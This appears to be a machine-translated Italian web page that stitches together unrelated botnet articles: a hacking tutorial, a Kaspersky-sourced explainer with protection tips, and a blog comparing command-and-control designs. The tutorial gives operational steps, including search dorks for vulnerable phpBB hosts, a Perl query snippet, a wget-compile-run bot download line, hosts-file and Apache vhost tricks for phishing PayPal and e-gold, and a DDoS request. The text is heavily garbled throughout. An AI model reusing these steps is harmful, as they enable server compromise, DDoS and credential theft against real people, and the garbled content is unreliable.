La campana.

Ci sono quelli che hanno letto questa notizia prima di te.
Iscriviti per ricevere articoli freschi.
E-mail
Nome
Cognome
Come vuoi leggere la campana
Senza spam

I sistemi di protezione sono costantemente migliorati, i programmatori diventano più esperti. Ora è consentito errori meno noti.

[prologo]
Internet è schiacciato con una forza enorme. Khakura diventa più difficile cercare vulnerabilità. Gli amministratori sono utilizzati per proteggere lo sviluppo di eksperts di sicurezza più cool. Conosci i tuoi pensieri? In effetti, ci sono molte vulnerabilità su Internet, questo è un piccolo senso da loro. Bene, è ancora come vedere qui, immagina la situazione, hai qualche tipo di bastardo di rete, vuoi punirlo. Oggi parleremo di creare la nostra botnet da combattimento.
Quindi, qual è il "bot". La persona non iniziata immediatamente in memoria si precipita stupidi avversari in giochi per computerche spari in due minuti. Sì, è in parte così. Nel nostro caso, il "Bot" è un programma che esegue le squadre incorporate. Vrodi non è niente di speciale. Qualcuno ha obiettato: "Io, dicono, in cinque anni ho scritto che, fai clic sul pulsante e sul programma, OLYA-LA, chiude" per dimenticare l'infanzia. Sappiamo tutti che le capacità della codifica sono infinite, ed è possibile usarlo per il bene e il male. Certo, usiamo sempre il nostro sviluppo con buone intimazioni. "Botnet" è un sacco di bot di raccolto in un centro, che eseguono sincrono i comandi del proprietario. Bots, a proposito, per lo più mirato maggiormente alle macchine Windows. Qui voi e password possono essere supportati e Sox da mettere e il formato della vite, andrò via dalle regole e darò come creare una botnet di automobili Nix. La funzione principale del nostro bot è una restrizione Ddos Atak.. esso modo perfetto Utilizzare ampi canali di server Nix. Contare. Il server che si desidera "riempire" supporti su un canale da 100 MB. Cioè, 10-20 robot in piedi sullo stesso canale tirerà il server per un momento. Se uno da un server può essere coperto con un firewall, quindi da più bot, Ahalo, senza salvataggio

[Scriviamo bot]
Elenco dei bot esemplari che troverai su un link alla fine dell'articolo. Comprenderemo un po 'con il codice. (Uh, sogno di nuovo tutto è controllato tramite IRC? Attraverso il web!). A proposito, il controllo tramite IRC è stato scelto attraverso la sua interattività. Supponiamo che voglio modificare gli exploit nucleari locali un paio di server in una botnet. Ho appena implementato gli strumenti di squadra SH Uname -a e trovo istantaneamente il computer di cui ho bisogno. Quindi esegue anche il comando nel client IRC, caricare Bacdor e ottenere shell interattivi per ulteriori azioni. Le caratteristiche sono illimitate. Dirai - puoi implementare tale controllo attraverso il web, ma perché riavviare la pagina e spendere il traffico? Gorryozda è più comodo osservare tutto in tempo reale (anche se, con più 1000 botnet, si prenderà cura della comodità dell'interfaccia. Spazzolo sanitario). Molte persone pensano che la restrizione dei DDO sia molto complessa. Ecco un esempio del codice del solito attacco:

Get /Server.org http / 1.0 \\ r \\ nconnection: keep-live \\ r \\ nuser-agent: mozilla / 4.75 (x11; u; windows 5.2 i686) \\ r \\ nhost: server.org:80\\R\\naccept: IMMAGINE / GIF, Immagine / XX-XBITMAP, IMMAGINE / JPEG, IMMAGINE / PJPEG, IMMAGINE / PNG, * / * \\ R \\ NACCECT-codifica: Gzip \\ r \\ naccept-Language: en \\ r \\ naccept-charset: è 8859 -1, *, utf-8 \\ r \\ n \\ r \\ n

Cioè, inviamo solo la richiesta al server che lo costringe a rispondere. Inoltre, inviarlo fino a quando il server non ricade dalla mancanza di traffico o del tempo del processore. Ma sei limitato a Sole Nix Bots, è necessario creare entrambi i botnet di Windows, ad esempio, in base a AGOBOT. Per fare ciò, è possibile creare un determinato codice per il bot che eseguirà la scansione sull'argomento delle vulnerabilità LSASL / DCOM della macchina collegata al server su cui è installato il bot.

[Crea una botnet]
Creare in realtà la botnet è molto facile. Per fare ciò, avremo bisogno di trovare una vulnerabilità in qualsiasi scrittura web. La vulnerabilità trovata dovrebbe consentire i comandi interpretativi della shell di eseguire. Quando trovi una vulnerabilità, prestare attenzione al nome del file della borsa, il suo titolo, il nome del sistema vulnerabile. Ora, con questi dati, devi fare un bene query di ricerca. Ad esempio, l'inserimento della rinomata vulnerabilità in PHPBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ SOCK \u003d IO :: presa :: inet-\u003e new (peerAdddr \u003d\u003e "search.aol.com", peerport \u003d\u003e "80", p ro to \u003d\u003e "tcp") o successivo; Stampa $ Sock "Get / Ooolcom / Search? Q \u003d ViewTopic.php% 3FT% 3D7 & Stage \u003d 0 e Pagina \u003d $ n http / 1.0 \\ n \\ n"; @resu \u003d.<$sock>; Chiudi ($ calzino);

Wget http://server.org/bot.cling.ccc bot.c -o bash; chmod + x bash; ./ bash;

Qui puoi vedere due problemi contemporaneamente. WETGET e GCC potrebbero non essere o il loro uso sarà proibito. Qui, la sedie a dondolo Fech, Curl e Get o Console Browser Lynx aiuteranno o utilizzare il protocollo FTP. La sua realizzazione è più complicata, ma anche più che FTP è che c'è dappertutto riguardo al compilatore, puoi semplicemente compilare il binario sul mio guscio e sperare che tutto vada bene con la compatibilità o riscrivi il bot a linguaggi interpretizzati - Perl o PHP. Ogni metodo ha i suoi vantaggi e svantaggi, cosa usare la tua scelta. Ho usato per usare il server catturato al massimo. Dopo tutto, il bot sul server Nix durerà solo fino al primo riavvio della macchina. Da questa situazione c'è una produzione interessante. Il bot cercherà file interpretativi (.pl, .php) disponibile sulla voce e aggiungi loro il codice di download a loro e avvia il bot. O puoi creare un altro botnet del vento. È anche implementato facilmente. Qui abbiamo bisogno di una vulnerabilità in Internet Exserver ( Internet Explorer., Opera, Mozilla) che conduce al salto ed esegui il file desiderato. Successiva viene creata la registrazione di Infradere che scarica il nostro codice dannoso. Questa voce viene aggiunta a tutti i file di indice (o in tutto dove c'è codice HTML., tutto dipende dalla tua arroganza). Con tale lavoro, un piccolo script è perfettamente affrontato con il Haz, che troverai anche nell'archivio. Bagzazz ha riempito di record su vulnerabilità critiche in Internet Explorer, in modo che nella nostra subordinazione sarà BotheNet Sistemi Windows. (I suoi vantaggi che ho menzionato sopra). Tutto, lancia il nostro verme di ricerca sullo schiavo ad alta velocità, bevande caffè (birra, vodka, succo di pomodoro) arriva il canale IRC indicato nelle proprietà del bot e osservare il numero dei tuoi subordinati. In conclusione, voglio trasmettere Ciao a tutti coloro che mi conoscono e ti auguro buona fortuna. Non venire.
XXXXHHHHHHHHHHHHHHHHHHHHHHHHHHHH XXX.

La vulnerabilità in PHPBB è rilevante fino a 2.0.16, sebbene gli sviluppatori sostengano di essere corretti a 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honetsnet.org.

Phishing.
È molto comodo usare i robot come organizzazione di phishing. Per fare ciò, abbiamo bisogno di pagine speciali affilate sotto la pagina phishing che emula il sito di cui abbiamo bisogno e buon hosting., server dedicato o VDS. Tali pagine possono essere fatte, per comprare, trovare online. La scelta è enorme. Il più spesso il phishing è organizzato su siti: e -gold.com, paypal.com, citybank.com, usbank.com, ebay.c om e altri, comunque, relativi al commercio elettronico. Successivamente, Windows Bot rewrita il file \\ System32 \\ Driver \\ etc \\ host aggiungendo l'indirizzo IP del server e assegnando il sito di cui è necessario. Il formato del file è il seguente:

102.54.94.97 e -gold.com 102.54.94.97 paypal.com

IE, punteggi nei siti del browser E -Gold.com e PayPal.com L'utente ottiene sul nostro server non è nulla di sospetto. A sua volta, i record sui domini pertinenti vengono aggiunti al server Fisher in httpd.conf.

DocumenTroot "/home/e-gold.com/www" Servername "www.e-gold.com" ServerAlias \u200b\u200b"E-Gold.com" "www.e-gold.com"

Sarà compreso nella riga del browser sarà tutto accordo familiare e -gold.com e persino un utente avanzato connesso al sito Nulla sospensione. Per completezza dell'immagine, dirò che se l'utente utilizza un server proxy, in questo modo non funzionerà

Bots per ogni gusto
AGOBOT / PHATBOT / FORBITT / XTREMBOT
Questa è la migliore famiglia di bottiglie. Scritto su c ++. Esistono molte funzioni di protezione da rilevamento e hanno più di 500 modifiche dovute a una struttura modulare chiaramente pronunciata.
Sdbot / rbot / urbot / urxbot
Molto popolare alla data dei robot per gli attacchi DDoS. Avere molte funzionalità aggiuntive. Come l'apertura di Sock4, Keylogger, scanner automatico dello scanner LSASS e vulnerabilità DCOM. Ha anche la funzione di reindirizzare le richieste ai siti delle società antivirus al server locale mediante modifica \\ System32 \\ Driver \\ etc \\ host e installazione di un piccolo falso server Web. su 80 porto.
Bots DSNX.
Questo bot può condurre attacchi DDOS, porte di scansione e alcune più piccole cose.
Q8 Bots.
Bot eccellente sotto il sistema Nix. Ha il suo codice compatto (27 Kb, consiste in un file) e non funzionalità dannose. Può essere aggiornato dinamicamente scaricando e eseguendo un nuovo file. Bene implementa l'implementazione di base dei DDO (Syn-Flood, UDP-Flood). In grado di eseguire squadre di sistema. Anche abbastanza ben mascherato nel sistema.
kaiten.
Anche un buon bot sotto il sistema UNIX / Linux. In grado di aprire una shell remota sul server di sequenza.
Bots a base di perl
Questi sono bot molto piccoli scritti su Perl. Utilizzato per attacchi DDOS sui sistemi basati su Unix.

---
L'articolo ha un grande pregiudizio verso l'hacking, quindi è incomprensibile - chiedere.

Oggi, i botnet sono diventati uno dei principali strumenti dei cybercriminali. Il computerbild dirà quali botnet sono come funzionano e come salvare il computer dall'ottenere la rete Zombie.

Una Botnet o una rete Zombie, è una rete di computer infettati da un programma dannoso che consente agli attaccanti di gestire a distanza di altre persone senza la conoscenza dei loro proprietari. NEL l'anno scorso Le reti di zombie sono diventate una fonte stabile di reddito per i cybercriminali. Esistono costi costantemente bassi e un minimo di conoscenza necessario per il controllo dei botnet, contribuiscono alla crescita della popolarità, e quindi il numero di botnet. Sugli attacchi DDoS o spedizione dello spam, eseguiti con reti zombie, gli attaccanti ei loro clienti guadagnano migliaia di dollari.

Il mio computer è stato infettato da un bot?

Rispondi a questa domanda non è facile. Il fatto è che monitorare l'intervento dei robot nel lavoro quotidiano del PC è quasi impossibile, poiché non influisce sulla velocità del sistema. Ciononostante, ci sono diversi segni per i quali è possibile determinare che un bot è presente nel sistema:

I programmi sconosciuti stanno cercando di connettersi a Internet, che periodicamente perturba il firewall o il software antivirus;

Il traffico Internet diventa molto grande, sebbene tu usi la rete molto moderatamente;

Nell'elenco dei processi di sistema di esecuzione, nuovo, mascherare sotto i soliti processi Windows appaiono (ad esempio, il bot può indossare il nome scvhost.exe - questo nome è molto simile al nome del sistema processo di Windows svchost.exe; È abbastanza difficile notare la differenza, ma - è possibile).

Perché i botnet sono creati

I batnet sono creati per fare soldi. Sono disponibili diverse aree di utilizzo commercialmente benefico delle reti zombie: Attacchi DDoS, Collezione informazioni confidenziali, SPEMA, Spam, Phishing, Cerca Spam, Cheat click contatori, ecc. Si noti che qualsiasi direzione sarà redditizia, qualunque sia l'utente malintenzionato, e Botnet ti consente di effettuare tutte le attività elencate allo stesso tempo.

Attacco DDoS (dall'inglese. Distributed Denial-of-Service) è un attacco sistema informaticoAd esempio, sul sito web, il cui scopo è quello di portare il sistema alla "caduta", cioè gli stati quando non può più ricevere e elaborare più le query degli utenti legittimi. Uno dei metodi di attacco DDOS più comuni è quello di inviare numerose richieste a un computer o un sito di sacrificio, che porta a un rifiuto di manutenzione se le risorse del computer attaccanti del computer non sono sufficienti per gestire tutte le richieste in arrivo. Gli attacchi DDoS sono formidabili armi da hacker e Botnet è uno strumento ideale per la loro azienda.

Gli attacchi DDoS possono essere sia un mezzo per ingiustizzare la lotta competitiva e gli atti di cyberroristico. L'ospite di Botnet può avere un servizio a chiunque non sia troppo scrupoloso imprenditore - per tenere un attacco DDOS sul sito del suo concorrente. La risorsa attaccata dopo un tale carico "Will", il cliente dell'attacco riceverà un vantaggio temporaneo, e la criminalità informatica è una ricompensa modesta (o meno).

Allo stesso modo, i proprietari di botnet stessi possono utilizzare attacchi DDOS per estorcere denaro da grandi aziende. Allo stesso tempo, le aziende preferiscono soddisfare i requisiti dei cybercriminali, poiché l'eliminazione delle conseguenze degli attacchi di successo DDoS è molto costoso. Ad esempio, nel gennaio 2009, uno dei più grandi hoster di Godaddy.com è stato sottoposto a un attacco DDOS, a causa della quale migliaia di siti pubblicati sui suoi server si sono rivelati inaccessibili per quasi un giorno. Le perdite finanziarie dell'Hoster erano enormi.

Nel febbraio 2007 sono stati detenuti un certo numero di attacchi ai server DNS root, il normale funzionamento dell'intero Internet dipende direttamente dall'operazione. È improbabile che lo scopo di questi attacchi sia stato il crollo della rete mondiale, poiché l'esistenza di reti zombie è possibile solo sotto la condizione che vi è e normalmente gestisce Internet. Soprattutto era simile alla dimostrazione della forza e delle possibilità delle reti zombie.

Servizi pubblicitari per l'attuazione degli attacchi DDOS aperti postati apertamente su molti forum di temi pertinenti. I prezzi di attacco fluttuano da 50 a diverse migliaia di dollari al giorno di funzionamento continuo DDOS-Botnet. Secondo il sito www.shadowserver.org, per il 2008 si sono tenuti circa 190 mila attacchi DDOS, su cui i cybercriminali sono stati in grado di guadagnare circa $ 20 milioni. Naturalmente, tale importo non include reddito da ricatto, che semplicemente impossibile da calcolare.

Raccogli informazioni riservate

Le informazioni riservate che sono memorizzate sui computer degli utenti attireranno sempre gli intrusi. I numeri della carta di credito, le informazioni finanziarie e le password per vari servizi sono più grandi interessi: cassette postali, server FTP, Messenger e altri. Allo stesso tempo, moderno programmi dannosi Consenti agli Attacker di scegliere esattamente i dati che sono interessanti, per questo è sufficiente caricare il modulo corrispondente sul PC.

I malati possono vendere informazioni rubate o usarla nei propri interessi. Un centinaio di annunci per la vendita dei conti bancari appaiono su numerosi forum online. Il costo dell'account dipende dalla quantità di denaro sul conto dell'utente e varia da 1 a $ 1.500 a causa di. Il bordo inferiore suggerisce che durante la lotta competitiva, i cybercriminali coinvolti in questo tipo di attività sono costretti a ridurre i prezzi. Per guadagnare più di molto, hanno bisogno di un afflusso stabile di dati freschi, e per questo è richiesta una crescita stabile delle reti zombie. Informazioni finanziarie particolarmente interessanti Corderi - Attacker impegnati in carte bancarie false.

Per quanto riguarda tali operazioni, è possibile giudicare la famosa storia con un gruppo di cybercriminali brasiliani, che sono stati arrestati due anni fa. Sono stati in grado di rimuovere gli utenti ordinari dai conti bancari di 4,74 milioni di dollari utilizzando informazioni rubate con i computer. Nell'acquisizione di dati personali che non hanno una relazione diretta con i soldi dell'utente e i criminali impegnati in documenti falsi, l'apertura di conti bancari falsi, committenendo transazioni illegali, ecc.

Un altro tipo di informazione raccolta da Botnet sono indirizzi e-mail, inoltre, in contrasto con i numeri e i conti della carta di credito, dalla rubrica di un PC infetto, è possibile estrarre molti indirizzi email. Gli indirizzi raccolti sono esposti in vendita, e talvolta "per il peso" - un povero. I principali acquirenti di tale "prodotto" sono gli spammer. L'elenco di un milione di indirizzi e-mail costa da 20 a 100 dollari, e la newsletter ordinata agli stessi milioni di indirizzi è di 150-200 dollari. Il vantaggio è ovvio.

Anche i criminali sono interessanti conti Valido servizi a pagamento e negozi online. Naturalmente, sono più economici dei conti bancari, ma la loro attuazione è associata a un rischio minore di persecuzione da parte delle forze dell'ordine.

Milioni di messaggi spam corrono ogni giorno in tutto il mondo. La spedizione di una posta annullata è una delle funzioni principali dei botnet moderni. Secondo il Lab Kaspersky, circa l'80% dell'intero spam viene inviato attraverso la rete zombi. Dai computer utenti rispettosi della legge Miliardi di lettere con pubblicità "Viagra" vengono inviate, copie di ore costose, casinò online, ecc., Canali di comunicazione di punteggio e cassette postali. Pertanto, gli hacker mettono sotto il punzone di computer in qualsiasi altro utente: gli indirizzi da cui la distribuzione è condotta in elenchi neri di società antivirus.

Negli ultimi anni, la sfera dei servizi di spam è stata espansa: è apparso lo spam ICQ, spam in social networks, Forum, blog. E questo è anche un "merito" dei proprietari di Botnet: dopo tutto, è completamente facile aggiungere un modulo aggiuntivo al Bot Client, aprendo gli orizzonti per la nuova attività con slogan come "Spam su Facebook. Poco costoso. " I prezzi dello spam variano a seconda del pubblico di destinazione e del numero di indirizzi a cui viene condotta la distribuzione. Larction of Prezzi per obiettivi - da $ 70 su centinaia di migliaia di indirizzi fino a $ 1.000 per poche decine di milioni di indirizzi. Nell'ultimo anno, gli spammer hanno guadagnato circa 780 milioni di dollari sull'invio di lettere.

Creazione di uno spam di ricerca

Un'altra opzione di utilizzare Botnet è aumentare la popolarità dei siti nei motori di ricerca. Lavorando su ottimizzazione del motore di ricerca, gli amministratori delle risorse cercano di aumentare la posizione del sito nei risultati della ricerca, dal momento che è più alto, più visitatori vanno al sito attraverso motori di ricerca E, quindi, maggiori saranno i ricavi del proprietario del sito, ad esempio, dalla vendita dello spazio pubblicitario sulle pagine web. Molte aziende pagano un sacco di soldi ai maestri web in modo che portino il sito alla prima posizione nei "motori di ricerca". I proprietari di botnet hanno spiato alcune delle loro tecniche e automatizzano il processo di ottimizzazione dei motori di ricerca.

Quando vedi nei commenti al tuo record nel "rivista Live Journal" o una foto di successo disposti sull'hosting fotografico, molti link creati dalla persona sconosciuta a te, e a volte il tuo "amico" - non essere sorpreso: solo qualcuno ha ordinato la promozione della tua risorsa al proprietario Botnet. Un programma appositamente creato viene caricato in un computer zombie e per conto del suo proprietario lascia i commenti sulle risorse popolari con riferimento al sito di filatura. Il prezzo medio per i servizi di spam di ricerca illegale è di circa 300 dollari al mese.

Quanto costano i dati personali

Il costo dei dati personali rubati dipende direttamente dal paese in cui vive il loro proprietario legale. Ad esempio, i dati totali del residente degli Stati Uniti sono 5-8 dollari. Nel mercato nero, questi residenti dell'Unione europea sono particolarmente valutati - sono due o tre volte più costosi dei dati dei cittadini statunitensi e del Canada. Questo può essere spiegato dal fatto che tali criminali dei dati possono godere in qualsiasi paese incluso nell'UE. In media, il prezzo di un pacchetto di dati completo di una persona è di circa $ 7.

Sfortunatamente, a chi ha deciso "da zero" per organizzare una botnet, non sarà molte difficoltà a trovare un'istruzione sulla creazione di una rete zombie su Internet. Primo passo: crea una nuova rete Zombie. Per fare ciò, infetta gli utenti degli utenti con un programma speciale - Bot. Per infezione, spedizione di spam, postare messaggi sui forum e social network e altre tecniche; Spesso il bot è dotato di una funzione di auto-proliferazione come virus o vermi.

Per fare una potenziale vittima stabilire un bot, utilizzare tecniche di ingegneria sociale. Ad esempio, è offerto di vedere un video interessante, che richiede scaricare un codec speciale. Dopo aver scaricato e avviare un tale file, l'utente, ovviamente, non sarà in grado di vedere alcun video e probabilmente non avverrà alcuna modifica, e il suo PC sarà infetto e diventerà un servo sottomesso che esegue tutti i comandi del ospite della botnet.

Il secondo metodo di infezione ampiamente utilizzato con i robot è drive-by-download. Quando si visita la pagina Web infettata dell'utente sul suo computer attraverso vari "fori" nelle applicazioni, prima di tutto nei browser popolari - il codice dannoso è stato caricato. Per utilizzare le debolezze utilizzate programmi speciali - Sfruttare. Permettono non solo impercettibilmente scaricato, ma anche impercettibilmente lanciato un virus o un bot. Questo tipo di diffusione di malware è più pericoloso, perché se una risorsa popolare è violata, decine di migliaia di utenti saranno feriti!

Bot può essere alimentato per funzione di auto-proliferazione reti di computer. Ad esempio, può essere distribuito infettando tutti i file eseguibili disponibili o ricercando e infetti da computer di rete vulnerabili.

Computer infetti. Nulla di sospetto gli utenti che il creatore della botnet può essere controllato utilizzando il Centro di comando BotNet, vincolante ai robot tramite il canale IRC, una connessione Web o utilizzando altri strumenti disponibili. Basta combinare diverse dozzine di auto nella rete in modo che la botnet abbia cominciato a portare reddito al suo padrone. Inoltre, questo reddito è in dipendenza lineare dalla stabilità della rete zombie e dei suoi tassi di crescita.

Aziende pubblicitarie che operano online secondo lo schema PPC (pay-per-click) Pay money per clic esclusivi sui collegamenti sugli annunci pubblicitari pubblicati su Internet. Per i proprietari del Baptnet, l'inganno di tali società è un'occupazione redditizia. Ad esempio, puoi prendere una rete ben nota. Google Adsense. Gli inserzionisti includevano in esso pagando Google per click sugli annunci pubblicati nella speranza che l'utente che guardava "sulla luce" comprerà qualcosa da loro.

Google a turno pubblicità contestuale Nei vari siti coinvolti nel programma AdSense, pagando la percentuale del proprietario del sito da ciascun clic. Ahimè, non tutti i proprietari di siti sono onesti. Avere una rete zombie, un hacker può generare migliaia di clic esclusivi al giorno - uno con ogni macchina, in modo da non causare sospetto speciale di Google. Quindi, il denaro speso compagnia pubblicitaria, scorrere in tasca verso l'hacker. Sfortunatamente, non c'era un singolo caso quando qualcuno è stato attratto per tali azioni. Secondo Fare clic su Forensics, nel 2008, circa il 16-17% di tutte le traduzioni sui collegamenti pubblicitari sono stati contraffatti, di cui il terzo è stato generato da una botnet. Dopo aver eseguito calcoli non complicati, può essere compreso che lo scorso anno i proprietari dei botnet "bloccati" 33.000.000 di dollari. Non cattivi redditi da clic con il mouse!

Gli attaccanti e gli uomini d'affari impuri a disposizione non sono necessariamente la creazione di una botnet "da zero". Batnetti di varie dimensioni e prestazioni possono acquistare o affittare da hacker, ad esempio, contattando forum specializzati.

Il costo della botnet finito, nonché il costo del suo contratto di locazione, dipende direttamente dal numero di computer inclusi in esso. La più grande popolarità dei botnet preconfezionati gode di forum di lingua inglese.

Piccoli batnetti, costituiti da diverse centinaia di robot, costo da 200 a 700 dollari. In cui prezzo medio Un bot è di circa 50 centesimi. I botnet più grandi sono grandi soldi.

La rete Shadow Zombie, creata diversi anni fa da un hacker di 19 anni dall'Olanda, aveva più di 100 mila computer situati in tutto il mondo, venduto per 25.000 euro. Per questo denaro è possibile acquistare una piccola casa in Spagna, tuttavia, il criminale del Brasile preferiva acquisire una botnet.

Strumenti di protezione contro Botnet

1. Prima di tutto, questi sono programmi aniviali e pacchetti completi per proteggere dalle minacce Internet con basi regolarmente aggiornate. Aiuteranno non solo per rilevare il pericolo nel tempo, ma anche per eliminarlo prima che il tuo zombie girassero il fedele "Iron Friend" inizierà a inviare spam o siti "Drop". Pacchetti complessi, come Kaspersky Internet. Sicurezza 2009, contiene un set completo funzioni di protezione, Puoi gestire il quale è possibile tramite il Centro Command General.

Modulo antivirus B. modalità di sfondo Esegue la scansione delle aree di sistema più importanti e controlla tutte le possibili ruote dell'invasione dei virus: allegati e-mail e siti Web potenzialmente pericolosi.

Il firewall monitora lo scambio di dati tra personal computer e Internet. Controlla tutti i pacchetti di dati ricevuti dalla rete o inviati a lì, e se necessario, blocca gli attacchi della rete e impedisce l'invio segreto dei dati personali a Internet.

Il filtro antispam protegge la cassetta postale dalla penetrazione dei messaggi pubblicitari. Il suo compito include anche l'identificazione delle lettere di phishing, con l'aiuto di cui gli aggressori stanno cercando di sopportare le informazioni sui suoi dati per inserire i sistemi di pagamento online o bancari.

2. Aggiornamento regolare sistema operativo, Browser Web e altre applicazioni i cui sviluppatori vengono rilevati ed eliminando anche molte barre nella loro protezione punti deboliusato dagli intrusi.

3. Il programma di crittografia speciale proteggerà i tuoi dati personali, anche se il BOT è entrato nel computer, poiché accederà, dovrà hackerare la password.

4. Buon senso e cautela. Se si desidera proteggere i tuoi dati da un diverso tipo di minacce, non dovresti scaricare e installare programmi di origine sconosciuta, aprire archivi con i file contrari a Avvertenze antivirus, andare a siti che il browser segna come pericoloso, ecc.

Ringraziamo Kaspersky Lab per aiuto nella preparazione del materiale

Non c'è da stupirsi di aver pubblicato la mia bozza note sulle reti associate . Commenti I lettori si sono rivelati molto utili. Mi hanno ispirato per ulteriori lavori in questa direzione. Cosa è successo da questo - Guarda sotto il taglio.

Come si può vedere dal nome del post, oggi sarà discusso solo sui botnet. Informazioni sulla condivisione di file, reti proxy, peerbog e valuta P2P per un po 'dimenticato.

Sotto la parola "Botnet" non dovrebbe essere compreso qualcosa di illegale. Quando l'utente scarica volontariamente e installa il "BOT" per sacrificare la sua risorsa di traffico e informatica alle esigenze del progetto scientifico, è anche BotNet. Di conseguenza, Botmaster non è necessariamente un criminale. Un gruppo di 30 scienziati coinvolti nel progetto scientifico è anche "Botmaster".

1. Controllo del bottacario tramite server

Il modo più semplice per controllare i bot è avviare il server IRC / HTTP. Attraverso di esso, i robot riceveranno comandi e con il suo aiuto per inviare il risultato della loro esecuzione.

Disegno, come posso :) In questo caso, l'illustrazione potrebbe non essere richiesta, ma ho deciso di prepararti a scioccare, il che produrrà altre immagini.

  • Attuazione molto semplice, specialmente nel caso dell'IRC.
  • Bots di risposta rapida.
  • Puoi dare ai comandi sia l'intera rete che un bot specifico.
  • Se la rete è composta da centinaia di nodi, un canale in Dalnet è sufficiente per gestirlo. Per le reti, può essere più grande a basso costo (circa 300 rubli / mese) web hosting.
  • Nel caso di httpTheServer è notevolmente semplificato dallo sviluppo di una bella interfaccia utente. Questo è importante se usiamo botnet in alcuni servizi Web.
  • Carica sul server. Il numero di nodi nei botnet più grandi è misurato da milioni. Per controllare una tale folla, un server è piccolo.
  • Se qualcosa accade al server (l'incidente sulla rete, DDOS, un incendio nel data center), la rete terminerà.
  • Un server è facile da avviare. Questo può essere fatto sia il fornitore che i prodotti Kaspersky Lab su un computer utente.
  • Botmaster è relativamente facile da trovare. Una volta dimenticato di VPN - Aspetta gli ospiti nelle catene.
  • Nel caso dell'IRCLe squadre ricevono solo bot online. Se il bot va al canale in due minuti dopo aver inviato il team, sarà "non nel soggetto".
  • Il numero di bot e il loro IP possono essere determinati andando al canale IRC. La password di protezione del canale non aiuterà, perché quest'ultimo è facile da scavare dal codice BOT.

2. Gestione attraverso la rete IRC

Un passo logico per combattere i minusti del metodo precedente non è un server, ma diversi. Secondo me, il modo più semplice per fare è, sollevare la rete IRC. In questo caso, tutta la responsabilità per il trasferimento dei dati tra i server cade protocollo IRC. . Dal lato dei robot non ci sarà alcuna differenza rispetto alla precedente decisione.

  • Semplice implementazione, anche se è necessario affrontare la configurazione dei server.
  • I robot rispondono ancora rapidamente alle squadre.
  • Puoi ancora dare comandi a un bot specifico.
  • Caricare la distribuzione tra server, protezione contro DDOS e Force Majeure. TENS. buoni server Potrebbe essere sufficiente per una rete da un milione di bot.
  • Se rifiuti parte dei server, puoi sostituirli con loro.
  • Se viene utilizzato IRC E confondere un migliaio di robot seduto sullo stesso canale, usa diversi canali. Di conseguenza, è possibile fornire diversi compiti in diverse parti della rete.
  • Dovremo uscire per il server / VDS.
  • È possibile acquistare tutti i server contemporaneamente e il botmaster non avrà il tempo di sostituirli.
  • Botmaster è ancora abbastanza facile da tenere traccia.
  • Nel caso dell'IRC, il numero di robot e il loro IP sono ancora in vista.
  • I robot che sono appena entrati nel canale, non nell'argomento.

Termine Tresting (Trust Ring, Cerchio / Ring Trust) Ho sentito per la prima volta dal compagno di Nickolas in commenti alla nota precedente. Noi stiamo parlando Sta per affidare la funzione "Server" su una parte della botnet.

  • Non hanno bisogno di server.
  • L'aumento può consistere in centinaia di nodi. Sollevare e controllare un numero di server IRC / HTTP non è facile.
  • I robot non dovrebbero mantenere costantemente la connessione con il tour. È sufficiente controllare ogni 5-10 minuti se non sono visualizzati nuovi comandi. Ogni squadra dovrebbe avere TTL durante il quale è memorizzato nel tour.
  • Un gran numero di "server" assicurano la stabilità della rete a tutti i tipi di disastri. Quando una parte dell'anello è eccezionale, il botmaster può dare una squadra sulla creazione di una nuova crostata. Oppure può far notare gli anelli (hai bisogno di firme digitali e del consenso di una certa percentuale di trids).
  • Lasciare che la degustazione sia composta da 512 nodi, almeno il 50% è costantemente online. Se ci sono 1.000.000 di robot sulla rete e ognuno di loro è costantemente online, meno di 4.000 robot hanno meno di 4.000 bot. Quando richiesto dai comandi BOT (o quando si invia il risultato) ogni 10 minuti, ciascun nodo ad anello elaborerà simultaneamente una media di 7 composti. Un bel po 'per la rete di queste dimensioni, giusto?
  • Solo Botmaster può ottenere l'elenco esatto di tutti i botmaster.
  • Puoi dare ai comandi un bot specifico o un gruppo di bot.
  • Reazione della bottiglia veloce alle squadre.
  • Botmaster è difficile da trovare.

L'unico minus, che vedo è la complessità dell'attuazione.

4. Reti di pirografia

Se ritieni le fonti Internet, i botnet P2P sono attualmente molto popolari. Tra queste fonti ci sono una maggiore attenzione. Ogni nodo di tale rete conosce solo alcuni nodi "vicini". Il botmaster invia comandi a diversi nodi di rete, dopo di che viene trasmesso dal vicino al vicino.

L'elenco dei vicini è rilasciato a bot una volta su un server speciale. Potrebbe essere, ad esempio, sito hacked. Altro server non fa nulla, è necessario solo durante l'aggiunta di nodi in BotNet.

  • L'implementazione è in qualche modo più facile rispetto al paragrafo precedente.
  • Carico minimo su tutti i nodi di rete. La dimensione della botnet è quasi illimitata.
  • Resistenza ai DDOS, disconnessione dei nodi e così via. P2P-BotNet è quasi impossibile da avviare.
  • Nessun collegamento permanente, come nel caso dell'IRC.
  • Hai bisogno di un server, anche se non a lungo.
  • I nodi di volta in volta muoiono, che influenza la connettività della rete.
  • Per ottenere un elenco di tutti i robot, è necessario, ad esempio, dare loro un comando per fare riferimento a un sito specifico. In questo caso, non vi è alcuna garanzia che l'elenco riceverà solo Botmaster.
  • Per dare un comando a un nodo specifico, è necessario inviarlo all'intera rete o connettersi direttamente al nodo.
  • Bot di reazione lente per le squadre.
  • Per inviare un comando "lungo", ad esempio, con un elenco di URL, è necessario utilizzare un server di terze parti, altrimenti i robot rallenano ancora di più.
  • Botmaster è più facile da trovare rispetto all'esempio precedente, a causa dell'uso di qualsiasi server.

Certo, potrei sbagliare, ma a mio parere i P2P-Botnet è molto peggiore della crostata. Forse produttori di antivirus su qualcosa di silenzioso?

5. Soluzione completa

Un modo per inventare qualcosa di nuovo e buono - attraversato qualcosa di vecchio. Combinato il telefono, il computer, il registratore del nastro, la fotocamera e la videocamera - ottenuto smartphone . Nessuno non sarà sorpreso dal computer e dal controllo del clima in macchina. Incolla per ogni magnete yogurt al frigorifero, e la vendita decolla.

